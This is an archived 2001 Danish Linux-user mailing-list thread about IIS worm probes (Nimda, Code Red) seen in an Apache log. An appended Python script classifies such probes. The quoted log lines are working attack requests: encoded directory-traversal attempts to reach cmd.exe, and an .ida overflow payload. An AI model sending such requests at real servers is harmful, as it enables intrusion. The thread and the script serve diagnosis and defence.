sslug-teknik team mailing list archive
Message #42222
Re: Hacker wannabes
Hi there
Those aren't actually hackers you're seeing there - it's our friend Nimda (the
virus that was going around last week), which poor unsuspecting
NT administrators have been infected with...
/Jesper
At 17:54 24-09-2001 +0200, you wrote:
Hello
Within the last 24 hours I have received a couple of break-in attempts from
just under 20 different IP addresses. All of them use roughly the same exploits,
which funnily enough are a Microsoft thing and will not be able to affect me. In
other words, it is not Kevin Mitnick I am dealing with.
It is, however, rather annoying. Can you set up your firewall to
reject the attempts, or at least set Apache to send them an
HTML/PHP page with a warning?
Other suggestions?
Strange that so many attempts with the same technique arrive at the same time!!
The following are a few lines from my access log:
212.217.79.226 - - [24/Sep/2001:09:18:26 +0200] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 292
212.217.79.226 - - [24/Sep/2001:09:18:30 +0200] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 290
212.217.79.226 - - [24/Sep/2001:09:18:34 +0200] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
212.217.79.226 - - [24/Sep/2001:09:18:38 +0200] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
212.217.79.226 - - [24/Sep/2001:09:18:42 +0200] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
212.217.79.226 - - [24/Sep/2001:09:18:43 +0200] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331
212.217.79.226 - - [24/Sep/2001:09:18:47 +0200] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331
212.217.79.226 - - [24/Sep/2001:09:18:48 +0200] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 347
212.217.79.226 - - [24/Sep/2001:09:18:52 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:05 +0200] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:07 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:08 +0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
212.217.79.226 - - [24/Sep/2001:09:19:12 +0200] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297
212.217.79.226 - - [24/Sep/2001:09:19:15 +0200] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297
212.217.79.226 - - [24/Sep/2001:09:19:19 +0200] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
212.217.79.226 - - [24/Sep/2001:09:19:23 +0200] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
212.158.24.240 - - [24/Sep/2001:09:33:17 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 287
What would you do in my place?
Kind regards
Robert
Use <sslug-netvaerk@xxxxxxxx> for networking topics
--
*******************************************
Jesper Hess Nielsen
Consultant / Developer
NTV Communications a/s
Phone: + 45 33 48 90 20
Direct: + 45 33 48 90 24
Mobile: + 45 26 25 66 99
jesper@xxxxxxxxx - www.ntvcom.dk
Nørre Voldgade 2, 2 sal
1358 København K
*******************************************
"Unless you have been on Mars, in a cave, with your eyes shut and your
fingers in your ears, you already know that XML is a possible solution to
this problem. "
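
An added example, not part of either message: a Python sketch that groups probes like the ones quoted above by source address and by the URL-encoding trick they use, and lists any probe the server answered with a 2xx status. The sample log is constructed (documentation-range addresses, shortened padding) and the labels are this example's own.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample in Apache common log format (documentation-range IPs, shortened padding).
SAMPLE_LOG = r"""
192.0.2.10 - - [24/Sep/2001:09:18:26 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 292
192.0.2.10 - - [24/Sep/2001:09:18:38 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
192.0.2.10 - - [24/Sep/2001:09:19:07 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
192.0.2.10 - - [24/Sep/2001:09:19:12 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 297
198.51.100.7 - - [24/Sep/2001:09:33:17 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090 HTTP/1.0" 404 287
203.0.113.5 - - [24/Sep/2001:10:02:00 +0200] "GET /index.html HTTP/1.0" 200 1043
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+$')

def decode_rounds(path, limit=3):
    """Percent-decode until stable; return (decoded path, number of rounds that changed it)."""
    rounds = 0
    while rounds < limit:
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def probe_kind(path):
    """Label a worm-style probe by target and encoding trick; None for ordinary requests."""
    decoded, rounds = decode_rounds(path)
    if re.search(r"/(?:root|cmd)\.exe\?", decoded, re.I):
        # 0xC0/0xC1 never start valid UTF-8; here they carry an overlong-encoded / or \.
        if re.search(r"%c[01]%[0-9a-f]{2}", path, re.I):
            return "cmd-exec/bad-utf8"
        return "cmd-exec/double-encoded" if rounds >= 2 else "cmd-exec/plain"
    if re.search(r"/default\.ida\?(.)\1{15,}", decoded, re.I):
        return "ida-overflow"  # long run of one padding character after default.ida?
    return None

def summarize(log_text):
    """Return ({ip: {kind: count}}, [(ip, path) for probes that got a 2xx answer])."""
    per_ip, answered = defaultdict(Counter), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and (kind := probe_kind(m.group(2))):
            per_ip[m.group(1)][kind] += 1
            if m.group(3).startswith("2"):
                answered.append((m.group(1), m.group(2)))
    return {ip: dict(kinds) for ip, kinds in per_ip.items()}, answered

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

An empty second element means every probe was refused with a 4xx, as in the quoted log; any entry there is the first thing to investigate.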